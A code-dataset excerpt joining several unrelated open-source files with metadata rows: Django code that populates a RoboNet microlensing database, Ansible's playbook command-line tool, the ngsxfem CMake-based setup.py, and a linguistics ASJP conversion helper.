e.g. datetime(2015, 9, 23, 15, 26, 13, 104683, tzinfo=<UTC>)
version -- Reduction identifier (integer, required)
ref_image -- Reference image used. (string, required)
-+-+- DanDIA parameters -+-+-
ron -- CCD readout noise (in ADU) (float, optional, default=0.0)
gain -- CCD gain. (e-/ADU) (float, optional, default=1.0)
oscanx1 -- Overscan strip coordinate x1 (integer, optional, default=1)
oscanx2 -- Overscan strip coordinate x2 (integer, optional, default=50)
oscany1 -- Overscan strip coordinate y1 (integer, optional, default=1)
oscany2 -- Overscan strip coordinate y2 (integer, optional, default=500)
imagex1 -- Image region coordinate x1 (integer, optional, default=51)
imagex2 -- Image region coordinate x2 (integer, optional, default=1000)
imagey1 -- Image region coordinate y1 (integer, optional, default=1)
imagey2 -- Image region coordinate y2 (integer, optional, default=1000)
minval -- Minimum useful pixel value in a raw image (ADU).
(float, optional, default=1.0)
maxval -- maximum useful pixel value in a raw image (ADU).
(float, optional, default=55000.0)
growsatx -- Half box size in the x direction (pix) to be used for growing
saturated bad pixels in the bad pixel mask for each science image.
This parameter should be non-negative.
(integer, optional, default=0)
growsaty -- Half box size in the y direction (pix) to be used for growing
saturated bad pixels in the bad pixel mask for each science image.
This parameter should be non-negative.
(integer, optional, default=0)
coeff2 -- Coefficient a1 in the linearisation equation:
Xnew = X + a1*X^2 + a2*X^3
where X represents the image counts after bias level and bias pattern
correction.
(float, optional, default=1.0e-06)
coeff3 -- Coefficient a1 in the linearisation equation:
Xnew = X + a1*X^2 + a2*X^3
where X represents the image counts after bias level and bias pattern
correction.
(float, optional, default=1.0e-12)
sigclip -- Threshold in units of sigma for cosmic ray detection on the Laplacian
image. This parameter should be positive.
(float, optional, default=4.5)
sigfrac -- Fraction of "sigclip" to be used as a threshold for cosmic ray growth.
This parameter should be positive.
(float, optional, default=0.5)
flim --.Minimum contrast between the Laplacian image and the fine structure image.
This parameter should be positive.
(float, optional, default=2.0)
niter -- Maximum number of iterations to perform.
This parameter should be positive.
(integer, optional, default=4)
use_reflist -- Use images in reflist.<filt>.txt?
(integer, optional, default=0 (No))
max_nimages -- Maximum number of images to combine for reference.
(integer, optional, default=1)
max_sky -- Maximum acceptable value for sky background.
(float, optional, default=5000.0)
min_ell -- Minimum PSF ellipticity for image to be used in reference.
(float, optional, default=0.8)
trans_type -- Type of coordinate transformation to fit when fitting a coordinate
transformation between two images.
Options:["shift"=General pixel shift, "rot_shift"=Rotation and
general pixel shift, "rot_mag_shift"=Rotation magnification
and general pixel shift, "linear"=Linear, "polynomial"=Polynomial]
(string, optional, default='polynomial')
trans_auto -- Use automatic determination of the coordinate transformation type
when fitting a coordinate transformation between two images?
(integer, optional, default=0 (No))
replace_cr -- Replace cosmic ray pixels? (integer, optional, default=0 (No))
min_scale -- Minimum possible transformation scale factor (magnification) between
any two images.
(float, optional, default=0.99)
max_scale -- Maximum possible transformation scale factor (magnification) between
any two images.
(float, optional, default=1.01)
fov -- Field of view of the CCD camera (deg).
(float, optional, default=0.1)
star_space -- Average spacing (pix) between stars.
(integer, optional, default=30)
init_mthresh -- Initial distance threshold (pix) to reject false star matches.
(float, optional, default=1.0)
smooth_pro -- Smooth image? (integer, optional, default=2)
smooth_fwhm -- Amount of smoothing to perform (float, optional, default=3.0)
var_deg -- Polynomial degree of the spatial variation of the model used to
represent the image PSF.
(0=Constant, 1=Linear, 2=Quadratic, 3=Cubic)
(integer, optional, default=1)
det_thresh -- Detection threshold used to detect stars in units of image sky
sigma.
(float, optional, default=2.0)
psf_thresh -- Detection threshold used to detect candidate PSF stars in units
of image sky sigma.
(float, optional, default=8.0)
psf_size -- Size of the model PSF stamp in units of FWHM.
(float, optional, default=8.0)
psf_comp_dist -- Any star within a distance "0.5*psf_comp_dist*psf_size",
in units of FWHM, of another star is considered to be a companion
of that star for PSF star selection.
(float, optional, default=0.7)
psf_comp_flux -- Maximum flux ratio that any companion star may have for a star to
be considered a PSF star.
(float, optional, default=0.1)
psf_corr_thres -- Minimum correlation coefficient of a star with the image PSF
model in order to be considered a PSF star.
(float, optional, default=0.9)
ker_rad -- Radius of the kernel pixel array in units of image FWHM.
(float, optional, default=2.0)
lres_ker_rad -- Threshold radius of the kernel pixel array, in units of image FWHM,
beyond which kernel pixels are of lower resolution.
(float, optional, default=2.0)
subframes_x -- Number of subdivisions in the x direction used in defining the grid
of kernel solutions.
(integer, optional, default=1)
subframes_y -- Number of subdivisions in the y direction used in defining the grid
of kernel solutions.
(integer, optional, default=1)
grow -- Amount of overlap between the image regions used for the kernel solutions.
(float, optional, default = 0.0)
ps_var -- Use spatially variable photometric scale factor?
(integer, optional, default=0 (No))
back_var -- Use spatially variable differential background.
(integer, optional, default=1 (Yes))
diffpro -- Switch for the method of difference image creation.
(integer, optional, default=0 (No))
"""
if event_name.startswith("OGLE") and check_exists(event_name)==True:
# Get event identifier
ev = Event.objects.get(ev_name_ogle=event_name)
ev.robonet_reduction_set.update_or_create(event=event_name, lc_file=lc_file,
timestamp=timestamp, version=version, ref_image=ref_image,
ron=ron, gain=gain, oscanx1=oscanx1,oscanx2=oscanx2,
oscany1=oscany1, oscany2=oscany2, imagex1=imagex1,
imagex2=imagex2, imagey1=imagey1, imagey2=imagey2,
minval=minval, maxval=maxval, growsatx=growsatx,
growsaty=growsaty, coeff2=coeff2, coeff3=coeff3,
sigclip=sigclip, sigfrac=sigfrac, flim=flim, niter=niter,
use_reflist=use_reflist, max_nimages=max_nimages, max_sky=max_sky,
min_ell=min_ell, trans_type=trans_type, trans_auto=trans_auto,
replace_cr=replace_cr, min_scale=min_scale, max_scale=max_scale,
fov=fov, star_space=star_space, init_mthresh=init_mthresh,
smooth_pro=smooth_pro, smooth_fwhm=smooth_fwhm, var_deg=var_deg,
det_thresh=det_thresh, psf_thresh=psf_thresh, psf_size=psf_size,
psf_comp_dist=psf_comp_dist, psf_comp_flux=psf_comp_flux,
psf_corr_thresh=psf_corr_thresh, ker_rad=ker_rad,
lres_ker_rad=lres_ker_rad, subframes_x=subframes_x,
subframes_y=subframes_y, grow=grow, ps_var=ps_var, back_var=back_var,
diffpro=diffpro)
ev.save()
successful = True
elif event_name.startswith("MOA") and check_exists(event_name)==True:
ev = Event.objects.get(ev_name_moa=event_name)
ev.robonet_reduction_set.update_or_create(event=event_name, lc_file=lc_file,
timestamp=timestamp, version=version, ref_image=ref_image,
ron=ron, gain=gain, oscanx1=oscanx1,oscanx2=oscanx2,
oscany1=oscany1, oscany2=oscany2, imagex1=imagex1,
imagex2=imagex2, imagey1=imagey1, imagey2=imagey2,
minval=minval, maxval=maxval, growsatx=growsatx,
growsaty=growsaty, coeff2=coeff2, coeff3=coeff3,
sigclip=sigclip, sigfrac=sigfrac, flim=flim, niter=niter,
use_reflist=use_reflist, max_nimages=max_nimages, max_sky=max_sky,
min_ell=min_ell, trans_type=trans_type, trans_auto=trans_auto,
replace_cr=replace_cr, min_scale=min_scale, max_scale=max_scale,
fov=fov, star_space=star_space, init_mthresh=init_mthresh,
smooth_pro=smooth_pro, smooth_fwhm=smooth_fwhm, var_deg=var_deg,
det_thresh=det_thresh, psf_thresh=psf_thresh, psf_size=psf_size,
psf_comp_dist=psf_comp_dist, psf_comp_flux=psf_comp_flux,
psf_corr_thresh=psf_corr_thresh, ker_rad=ker_rad,
lres_ker_rad=lres_ker_rad, subframes_x=subframes_x,
subframes_y=subframes_y, grow=grow, ps_var=ps_var, back_var=back_var,
diffpro=diffpro)
ev.save()
successful = True
elif event_name.startswith("KMT") and check_exists(event_name)==True:
ev = Event.objects.get(ev_name_kmt=event_name)
ev.robonet_reduction_set.update_or_create(event=event_name, lc_file=lc_file,
timestamp=timestamp, version=version, ref_image=ref_image,
ron=ron, gain=gain, oscanx1=oscanx1,oscanx2=oscanx2,
oscany1=oscany1, oscany2=oscany2, imagex1=imagex1,
imagex2=imagex2, imagey1=imagey1, imagey2=imagey2,
minval=minval, maxval=maxval, growsatx=growsatx,
growsaty=growsaty, coeff2=coeff2, coeff3=coeff3,
sigclip=sigclip, sigfrac=sigfrac, flim=flim, niter=niter,
use_reflist=use_reflist, max_nimages=max_nimages, max_sky=max_sky,
min_ell=min_ell, trans_type=trans_type, trans_auto=trans_auto,
replace_cr=replace_cr, min_scale=min_scale, max_scale=max_scale,
fov=fov, star_space=star_space, init_mthresh=init_mthresh,
smooth_pro=smooth_pro, smooth_fwhm=smooth_fwhm, var_deg=var_deg,
det_thresh=det_thresh, psf_thresh=psf_thresh, psf_size=psf_size,
psf_comp_dist=psf_comp_dist, psf_comp_flux=psf_comp_flux,
psf_corr_thresh=psf_corr_thresh, ker_rad=ker_rad,
lres_ker_rad=lres_ker_rad, subframes_x=subframes_x,
subframes_y=subframes_y, grow=grow, ps_var=ps_var, back_var=back_var,
diffpro=diffpro)
ev.save()
successful = True
else:
successful = False
return successful
################################################################################################################
def update_request(event_name, t_sample, exptime, timestamp=timezone.now(), onem_on=False,
twom_on=False, request_type='M', which_filter='ip'):
"""
Update or Add robonet observing request to the database.
Keyword arguments:
event_name -- The event name. (string, required)
e.g. "OGLE-2015-BLG-1234"
t_sample -- Sampling interval to use. (in minutes) (float, required)
exptime -- Exposure time to use. (in seconds) (integer, required)
timestamp -- The request submission time.
(datetime, optional, default=timezone.now())
e.g. datetime(2015, 9, 23, 15, 26, 13, 104683, tzinfo=<UTC>)
onem_on -- Observe on 1m network? (boolean, optional, default=False)
twom_on -- Observe on 2m network? (boolean, optional, default=False)
request_type -- Observation request class (string, optional, default='M')
('T':'ToO','M':'Monitor', 'S':'Single')
which_filter -- Filter identifier string. (string, optional, default='ip')
"""
if event_name.startswith("OGLE") and check_exists(event_name)==True:
# Get event identifier
ev = Event.objects.get(ev_name_ogle=event_name)
ev.robonet_request_set.update_or_create(event=event_name, timestamp=timestamp,
onem_on=onem_on, twom_on=twom_on, t_sample=t_sample, exptime=exptime,
request_type=request_type, which_filter=which_filter)
ev.save()
successful = True
elif event_name.startswith("MOA") and check_exists(event_name)==True:
ev = Event.objects.get(ev_name_moa=event_name)
ev.robonet_request_set.update_or_create(event=event_name, timestamp=timestamp,
onem_on=onem_on, twom_on=twom_on, t_sample=t_sample, exptime=exptime,
request_type=request_type, which_filter=which_filter)
ev.save()
successful = True
elif event_name.startswith("KMT") and check_exists(event_name)==True:
ev = Event.objects.get(ev_name_kmt=event_name)
ev.robonet_request_set.update_or_create(event=event_name, timestamp=timestamp,
onem_on=onem_on, twom_on=twom_on, t_sample=t_sample, exptime=exptime,
request_type=request_type, which_filter=which_filter)
ev.save()
successful = True
else:
successful = False
return successful
################################################################################################################
def update_status(event_name, timestamp=timezone.now(), priority='L', status='AC',
comment='--', updated_by='--', omega=0.0):
"""
Update or Add robonet status to the database.
Keyword arguments:
event_name -- The event name. (string, required)
e.g. "OGLE-2015-BLG-1234"
timestamp -- The request submission time.
(datetime, optional, default=timezone.now())
e.g. datetime(2015, 9, 23, 15, 26, 13, 104683, tzinfo=<UTC>)
priority -- Priority flag for human observers.
(A:anomaly, H:high, M:medium, L:low)
(string, optional, default='L')
status -- Event status.
(CH:check, AC:active, AN:anomaly, RE:rejected, EX:expired)
(string, optional, default='AC')
comment -- Comment field. (string, optional, default='--')
updated_by -- Updated by which user? (string, optional, default='--')
omega -- Priority value calculated based on parameters. (float, optional, default=0.0)
"""
if event_name.startswith("OGLE") and check_exists(event_name)==True:
# Get event identifier
ev = Event.objects.get(ev_name_ogle=event_name)
ev.robonet_status_set.update_or_create(event=event_name, timestamp=timestamp,
priority=priority, status=status, comment=comment,
updated_by=updated_by, omega=omega)
ev.save()
successful = True
elif event_name.startswith("MOA") and check_exists(event_name)==True:
ev = Event.objects.get(ev_name_moa=event_name)
ev.robonet_status_set.update_or_create(event=event_name, timestamp=timestamp,
priority=priority, status=status, comment=comment,
updated_by=updated_by, omega=omega)
ev.save()
successful = True
elif event_name.startswith("KMT") and check_exists(event_name)==True:
ev = Event.objects.get(ev_name_kmt=event_name)
ev.robonet_status_set.update_or_create(event=event_name, timestamp=timestamp,
priority=priority, status=status, comment=comment,
updated_by=updated_by, omega=omega)
ev.save()
successful = True
else:
successful = False
return successful
################################################################################################################
##TEST
def run_test():
# Populate Event database
from glob import glob
ogle_event_list = glob('/work/Tux8/ytsapras/Data/RoboNet/ARTEMiS/PublishedParameters/2015/OGLE/*.model')
count = 0
for i in ogle_event_list:
data = open(i).read().split()
ev_ra = data[0]
ev_dec = data[1]
event_name = data[2].replace('OB15','OGLE-2015-BLG-')
add_new_event(event_name, ev_ra, ev_dec)
count = count + 1
print count
# Populate Ogle_Detail database
from glob import glob
ogle_event_list = glob('/work/Tux8/ytsapras/Data/RoboNet/ARTEMiS/PublishedParameters/2015/OGLE/*.model')
count = 0
for i in ogle_event_list:
data = open(i).read().split()
event_name = data[2].replace('OB15','OGLE-2015-BLG-')
Tmax = 2450000.0+float(data[3])
tau = float(data[5])
umin = float(data[7])
year, og_id = '20'+data[2][2:4], data[2].replace('OB15','blg-')
url_link = 'http://ogle.astrouw.edu.pl/ogle4/ews/%s/%s.html' % (year, og_id)
last_updated=timezone.now()
ogle_details(event_name=event_name, Tmax=Tmax, tau=tau, umin=umin,
url_link=url_link, last_updated=last_updated)
count = count + 1
print count
# Populate Data_File database
from astropy.time import Time
ogle_dat_list = glob('/work/Tux8/ytsapras/Data/RoboNet/ARTEMiS/data/*OB15*I.dat')
count = 0
for i in ogle_dat_list:
data = open(i).readlines()
data = data[1:]
if (data != []):
event_name = i.split('/')[-1][1:-5].replace('OB15','OGLE-2015-BLG-')
datafile = i
last_upd = Time(float('245'+data[-1].split()[2]), format='jd').datetime
last_upd = timezone.make_aware(last_upd, timezone.get_current_timezone())
last_mag = float(data[-1].split()[0])
ndat = len(data)-1
tel = i.split('/')[-1][0:1]
ver = 1
update_data(event_name, datafile, last_upd, last_mag, tel, ver, ndat)
count = count + 1
print count
# Populate Robonet_Status database
count = 0
ogle_events_list = Event.objects.filter(ev_name_ogle__contains="OGLE")
for event_id in ogle_events_list:
event_name = event_id.ev_name_ogle
update_status(event_name, timestamp=timezone.now(), priority='L', status='AC',
comment='--', updated_by='--')
count = count + 1
print count
# Populate Robonet_Request database
import random
count = 0
ogle_events_list = Event.objects.filter(ev_name_ogle__contains="OGLE")
for event_id in ogle_events_list:
event_name = event_id.ev_name_ogle
t_sample = random.uniform(0.1,24.0)
exptime = random.randint(10,300)
update_request(event_name, t_sample, exptime, timestamp=timezone.now(), onem_on=False,
twom_on=False, request_type='M', which_filter='ip')
count = count + 1
print count
# Populate Robonet_Log database
import random
count = 0
ogle_events_list = Event.objects.filter(ev_name_ogle__contains="OGLE")
for event_id in ogle_events_list:
event_name = event_id.ev_name_ogle
image_name = "image_name.fits"
timestamp = timezone.now()
exptime = random.randint(10,300)
filter1 = 'air'
filter2 = 'ip'
filter3 = 'air'
telescope = '1m0-02'
instrument = 'kb70'
group_id = "RBN20150922T15.42112818"
track_id = "0000110965"
req_id = "0000427795"
airmass = 1.33
fwhm = 6.45
sky_bg = 2143.5435347
sd_bg = 80.543
moon_sep = 18.43
elongation = 1.2345234
nstars = 120
quality = "Rejected: High FWHM of stars "
update_log(event_name, image_name, timestamp, exptime,
filter1, filter2, filter3, telescope, instrument, group_id,
track_id, req_id, airmass, fwhm, sky_bg, sd_bg, moon_sep,
elongation, nstars, quality)
count = count + 1
print count
# Populate Robonet_Reduction database
count = 0
ogle_events_list = Event.objects.filter(ev_name_ogle__contains="OGLE")
for event_id in ogle_events_list:
event_name = event_id.ev_name_ogle
lc_file = 'lc_'+event_name+'_ip.t'
timestamp = timezone.now()
version = 1
ref_image = 'reference.fits'
update_reduction(event_name, lc_file, timestamp, version, ref_image, ron=0.0, gain=1.0,
oscanx1=1, oscanx2=50, oscany1=1, oscany2=500, imagex1=51, imagex2=1000,
imagey1=1, imagey2=1000, minval=1.0, maxval=55000.0, growsatx=0,
growsaty=0, coeff2=1.0e-06, coeff3=1.0e-12,
sigclip=4.5, sigfrac=0.5, flim=2.0, niter=4, use_reflist=0, max_nimages=1,
max_sky=5000.0, min_ell=0.8, trans_type='polynomial', trans_auto=0, replace_cr=0,
min_scale=0.99, max_scale=1.01,
fov=0.1, star_space=30, init_mthresh=1.0, smooth_pro=2, smooth_fwhm=3.0,
var_deg=1, det_thresh=2.0, psf_thresh=8.0, psf_size=8.0, psf_comp_dist=0.7,
psf_comp_flux=0.1, psf_corr_thresh=0.9, ker_rad=2.0, lres_ker_rad=2.0,
subframes_x=1, subframes_y=1, grow=0.0, ps_var=0, back_var=1, diffpro=0)
count = count + 1
print count
# Populate Single_Model database
from glob import glob
from astropy.time import Time
ogle_event_list = glob('/work/Tux8/ytsapras/Data/RoboNet/ARTEMiS/model/OB15*.model')
count = 0
for i in ogle_event_list:
data = open(i).read().split()
event_name = data[2].replace('OB15','OGLE-2015-BLG-')
Tmax = 2450000.0+float(data[3])
e_Tmax = float(data[4])
tau = float(data[5])
e_tau = float(data[6])
umin = float(data[7])
e_umin = float(data[8])
if (data[12] != '0.0'):
last_updated = Time(float('245'+data[12]), format='jd').datetime
last_updated = timezone.make_aware(last_updated, timezone.get_current_timezone())
else:
last_updated = timezone.now()
single_lens_par(event_name, Tmax, e_Tmax, tau, e_tau, umin, e_umin, last_updated)
count = count + 1
print count
len(Event.objects.all())
def run_test2():
# Path to ARTEMiS files
artemis = "/work/Tux8/ytsapras/Data/RoboNet/ARTEMiS/"
# Color & site definitions for plotting
colors = artemis+"colours.sig.cfg"
colordef = artemis+"colourdef.sig.cfg"
# Set up and populate dictionaries
col_dict = {}
site_dict = {}
with open(colors) as f:
for line in f:
elem = line.split()
key = elem[0]
tel_id = " ".join([e.replace('"','') for e in elem[3:]])
vals = [elem[1], elem[2], tel_id]
site_dict[key] = vals
with open(colordef) as f:
for line in f:
elem = line.split()
key = elem[0]
val = elem[1]
col_dict[key] = val
# Populate Operator database
for s in ['OGLE', 'MOA', 'KMTNet', 'WISE', 'MOA', 'OGLE', 'KMTNet', 'PLANET', 'RoboNet', 'uFUN', 'uFUN', 'Other']:
add_operator(s)
# Populate Telescope database
from random import uniform
for i in site_dict.keys():
tel_name = site_dict[i][-1]
if ('LCOGT' in tel_name) or ('Liverpool' in tel_name):
# Get the appropriate pk for RoboNet
operator = Operator.objects.get(name='RoboNet')
site = tel_name.split(' ')[1]
elif 'OGLE' in tel_name:
operator = Operator.objects.get(name='OGLE')
site = 'CTIO'
elif 'MOA' in tel_name:
operator = Operator.objects.get(name='MOA')
site = 'New Zealand'
else:
operator = Operator.objects.get(name='Other')
site = ''
aperture = uniform(1.0,2.0)
add_telescope(operator=operator, telescope_name=tel_name, aperture=aperture, site=site)
# Populate Instrument database
for i in Telescope.objects.all().values():
inst = i['name']+' CCD camera'
telescope = Telescope.objects.get(name=i['name'])
pixscale = uniform(0.1,1.4)
add_instrument(telescope=telescope, instrument_name=inst, pixscale=pixscale)
# Add a few test instruments at existing telescopes
telescope = Telescope.objects.get(name='LCOGT SAAO 1m A')
inst = '!!!TEST SAA0 1m A NEW INST!!!'
pixscale = uniform(0.1,1.4)
add_instrument(telescope=telescope, instrument_name=inst, pixscale=pixscale)
telescope = Telescope.objects.get(name='Faulkes North 2.0m')
inst = '!!!TEST FTN 2.0m NEW INST!!!'
pixscale = uniform(0.1,1.4)
add_instrument(telescope=telescope, instrument_name=inst, pixscale=pixscale)
telescope = Telescope.objects.get(name='LCOGT CTIO 1m A')
inst = '!!!TEST CTIO 1m A NEW INST!!!'
pixscale = uniform(0.1,1.4)
add_instrument(telescope=telescope, instrument_name=inst, pixscale=pixscale)
# Populate filter database
filters = ['Bessell-U', 'Bessell-B', 'Bessell-V','Bessell-R','Bessell-I', 'SDSS-u',
'SDSS-g', 'SDSS-r', 'SDSS-i', 'SDSS-z', 'H-alpha']
for i in Instrument.objects.all():
for j in filters:
add_filter(instrument=i, filter_name=j)
| gpl-2.0 | 7,512,084,029,422,223,000 | 45.410816 | 173 | 0.614224 | false | 3.405054 | false | false | false |
Russell-IO/ansible | lib/ansible/cli/playbook.py | 63 | 8553 | # (c) 2012, Michael DeHaan <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
########################################################
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import stat
from ansible.cli import CLI
from ansible.errors import AnsibleError, AnsibleOptionsError
from ansible.executor.playbook_executor import PlaybookExecutor
from ansible.playbook.block import Block
from ansible.playbook.play_context import PlayContext
try:
from __main__ import display
except ImportError:
from ansible.utils.display import Display
display = Display()
class PlaybookCLI(CLI):
''' the tool to run *Ansible playbooks*, which are a configuration and multinode deployment system.
See the project home page (https://docs.ansible.com) for more information. '''
def parse(self):
# create parser for CLI options
parser = CLI.base_parser(
usage="%prog [options] playbook.yml [playbook2 ...]",
connect_opts=True,
meta_opts=True,
runas_opts=True,
subset_opts=True,
check_opts=True,
inventory_opts=True,
runtask_opts=True,
vault_opts=True,
fork_opts=True,
module_opts=True,
desc="Runs Ansible playbooks, executing the defined tasks on the targeted hosts.",
)
# ansible playbook specific opts
parser.add_option('--list-tasks', dest='listtasks', action='store_true',
help="list all tasks that would be executed")
parser.add_option('--list-tags', dest='listtags', action='store_true',
help="list all available tags")
parser.add_option('--step', dest='step', action='store_true',
help="one-step-at-a-time: confirm each task before running")
parser.add_option('--start-at-task', dest='start_at_task',
help="start the playbook at the task matching this name")
self.parser = parser
super(PlaybookCLI, self).parse()
if len(self.args) == 0:
raise AnsibleOptionsError("You must specify a playbook file to run")
display.verbosity = self.options.verbosity
self.validate_conflicts(runas_opts=True, vault_opts=True, fork_opts=True)
def run(self):
super(PlaybookCLI, self).run()
# Note: slightly wrong, this is written so that implicit localhost
# Manage passwords
sshpass = None
becomepass = None
passwords = {}
# initial error check, to make sure all specified playbooks are accessible
# before we start running anything through the playbook executor
for playbook in self.args:
if not os.path.exists(playbook):
raise AnsibleError("the playbook: %s could not be found" % playbook)
if not (os.path.isfile(playbook) or stat.S_ISFIFO(os.stat(playbook).st_mode)):
raise AnsibleError("the playbook: %s does not appear to be a file" % playbook)
# don't deal with privilege escalation or passwords when we don't need to
if not self.options.listhosts and not self.options.listtasks and not self.options.listtags and not self.options.syntax:
self.normalize_become_options()
(sshpass, becomepass) = self.ask_passwords()
passwords = {'conn_pass': sshpass, 'become_pass': becomepass}
loader, inventory, variable_manager = self._play_prereqs(self.options)
# (which is not returned in list_hosts()) is taken into account for
# warning if inventory is empty. But it can't be taken into account for
# checking if limit doesn't match any hosts. Instead we don't worry about
# limit if only implicit localhost was in inventory to start with.
#
# Fix this when we rewrite inventory by making localhost a real host (and thus show up in list_hosts())
hosts = CLI.get_host_list(inventory, self.options.subset)
# flush fact cache if requested
if self.options.flush_cache:
self._flush_cache(inventory, variable_manager)
# create the playbook executor, which manages running the plays via a task queue manager
pbex = PlaybookExecutor(playbooks=self.args, inventory=inventory, variable_manager=variable_manager, loader=loader, options=self.options,
passwords=passwords)
results = pbex.run()
if isinstance(results, list):
for p in results:
display.display('\nplaybook: %s' % p['playbook'])
for idx, play in enumerate(p['plays']):
if play._included_path is not None:
loader.set_basedir(play._included_path)
else:
pb_dir = os.path.realpath(os.path.dirname(p['playbook']))
loader.set_basedir(pb_dir)
msg = "\n play #%d (%s): %s" % (idx + 1, ','.join(play.hosts), play.name)
mytags = set(play.tags)
msg += '\tTAGS: [%s]' % (','.join(mytags))
if self.options.listhosts:
playhosts = set(inventory.get_hosts(play.hosts))
msg += "\n pattern: %s\n hosts (%d):" % (play.hosts, len(playhosts))
for host in playhosts:
msg += "\n %s" % host
display.display(msg)
all_tags = set()
if self.options.listtags or self.options.listtasks:
taskmsg = ''
if self.options.listtasks:
taskmsg = ' tasks:\n'
def _process_block(b):
taskmsg = ''
for task in b.block:
if isinstance(task, Block):
taskmsg += _process_block(task)
else:
if task.action == 'meta':
continue
all_tags.update(task.tags)
if self.options.listtasks:
cur_tags = list(mytags.union(set(task.tags)))
cur_tags.sort()
if task.name:
taskmsg += " %s" % task.get_name()
else:
taskmsg += " %s" % task.action
taskmsg += "\tTAGS: [%s]\n" % ', '.join(cur_tags)
return taskmsg
all_vars = variable_manager.get_vars(play=play)
play_context = PlayContext(play=play, options=self.options)
for block in play.compile():
block = block.filter_tagged_tasks(play_context, all_vars)
if not block.has_tasks():
continue
taskmsg += _process_block(block)
if self.options.listtags:
cur_tags = list(mytags.union(all_tags))
cur_tags.sort()
taskmsg += " TASK TAGS: [%s]\n" % ', '.join(cur_tags)
display.display(taskmsg)
return 0
else:
return results
def _flush_cache(self, inventory, variable_manager):
for host in inventory.list_hosts():
hostname = host.get_name()
variable_manager.clear_facts(hostname)
| gpl-3.0 | -1,190,748,893,708,862,500 | 42.637755 | 145 | 0.542734 | false | 4.663577 | false | false | false |
ngsxfem/ngsxfem | setup.py | 1 | 3528 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import re
import sys
import platform
import subprocess
from setuptools import setup, Extension
from setuptools.command.build_ext import build_ext
from distutils.version import LooseVersion
class CMakeExtension(Extension):
def __init__(self, name, sourcedir=''):
Extension.__init__(self, name, sources=[])
self.sourcedir = os.path.abspath(sourcedir)
class CMakeBuild(build_ext):
def run(self):
try:
out = subprocess.check_output(['cmake', '--version'])
except OSError:
raise RuntimeError("CMake must be installed to build the following extensions: " +
", ".join(e.name for e in self.extensions))
if platform.system() == "Windows":
cmake_version = LooseVersion(re.search(r'version\s*([\d.]+)', out.decode()).group(1))
if cmake_version < '3.1.0':
raise RuntimeError("CMake >= 3.1.0 is required on Windows")
for ext in self.extensions:
self.build_extension(ext)
def build_extension(self, ext):
extdir = os.path.abspath(os.path.dirname(self.get_ext_fullpath(ext.name)))
# required for auto-detection of auxiliary "native" libs
if not extdir.endswith(os.path.sep):
extdir += os.path.sep
cmake_args = ['-DCMAKE_LIBRARY_OUTPUT_DIRECTORY=' + extdir,
'-DPYTHON_EXECUTABLE=' + sys.executable,
'-DCMAKE_CXX_COMPILER=ngscxx',
'-DCMAKE_LINKER=ngsld',
'-DBUILD_STUB_FILES=ON',
'-DBUILD_NGSOLVE=OFF']
cfg = 'Debug' if self.debug else 'Release'
build_args = ['--config', cfg]
if platform.system() == "Windows":
#not expected to work... (but who knows..)
cmake_args += ['-DCMAKE_LIBRARY_OUTPUT_DIRECTORY_{}={}'.format(cfg.upper(), extdir)]
if sys.maxsize > 2**32:
cmake_args += ['-A', 'x64']
build_args += ['--', '/m']
else:
cmake_args += ['-DCMAKE_BUILD_TYPE=' + cfg]
build_args += ['--', '-j2']
env = os.environ.copy()
env['CXXFLAGS'] = '{} -DVERSION_INFO=\\"{}\\"'.format(env.get('CXXFLAGS', ''),
self.distribution.get_version())
if not os.path.exists(self.build_temp):
os.makedirs(self.build_temp)
subprocess.check_call(['cmake', ext.sourcedir] + cmake_args, cwd=self.build_temp, env=env)
subprocess.check_call(['cmake', '--build', '.'] + build_args, cwd=self.build_temp)
subprocess.check_call(['mv', 'ngsxfem_py.so', 'xfem'], cwd=self.build_lib)
setup(
name='xfem',
version='2.0',
author='Christoph Lehrenfeld',
author_email='[email protected]',
description='(ngs)xfem is an Add-on library to Netgen/NGSolve for unfitted/cut FEM.',
long_description='(ngs)xfem is an Add-on library to Netgen/NGSolve which enables the use of unfitted finite element technologies known as XFEM, CutFEM, TraceFEM, Finite Cell, ... . ngsxfem is an academic software. Its primary intention is to facilitate the development and validation of new numerical methods.',
url="https://github.com/ngsxfem/ngsxfem",
ext_modules=[CMakeExtension('ngsxfem_py')],
cmdclass=dict(build_ext=CMakeBuild),
packages=["xfem"],
package_dir={"xfem": "python"},
python_requires='>=3.5',
)
| lgpl-3.0 | -3,344,411,647,456,524,300 | 46.04 | 315 | 0.589569 | false | 3.698113 | false | false | false |
evolaemp/svmcc | code/prepare/utils.py | 1 | 2495 | import re
from lingpy.sequence.sound_classes import ipa2tokens, tokens2class
def make_sample_id(gloss_id, lang1, lang2, index1, index2):
"""
Sample IDs should uniquely identify a feature row.
Sample sample ID: 98/English,German/1,1
"""
assert lang1 < lang2
s = str(gloss_id) + '/'
s += lang1 +','+ lang2 + '/'
s += str(index1) +','+ str(index2)
return s
def explode_sample_id(sample_id, langs):
"""
Returns (gloss, lang1, lang2, index1, index2).
Expects the set of all possible langs as second argument.
Note: some datasets contain language names with chars such as: `/`, `,`.
"""
gloss = sample_id.split('/')[0]
lang_part = sample_id.split('/', maxsplit=1)[1]
lang_part = lang_part.rsplit('/', maxsplit=1)[0]
for lang1 in langs:
if lang_part.startswith(lang1+','):
lang2 = lang_part[len(lang1)+1:]
if lang2 in langs:
break
assert lang1 in langs
assert lang2 in langs
key1, key2 = sample_id.rsplit('/', maxsplit=1)[1].split(',')
key1, key2 = int(key1) - 1, int(key2) - 1
return gloss, lang1, lang2, key1, key2
def clean_asjp(word):
"""
Removes ASJP diacritics.
"""
word = re.sub(r",","-",word)
word = re.sub(r"\%","",word)
word = re.sub(r"\*","",word)
word = re.sub(r"\"","",word)
word = re.sub(r".~","",word)
word = re.sub(r"(.)(.)(.)\$",r"\2",word)
word = re.sub(r" ","-",word)
return word
def ipa_to_asjp(w, params):
"""
Lingpy IPA-to-ASJP converter plus some cleanup.
Expects the params {} to contain the key: sounds.
This function is called on IPA datasets.
"""
w = w.replace('\"','').replace('-','').replace(' ','')
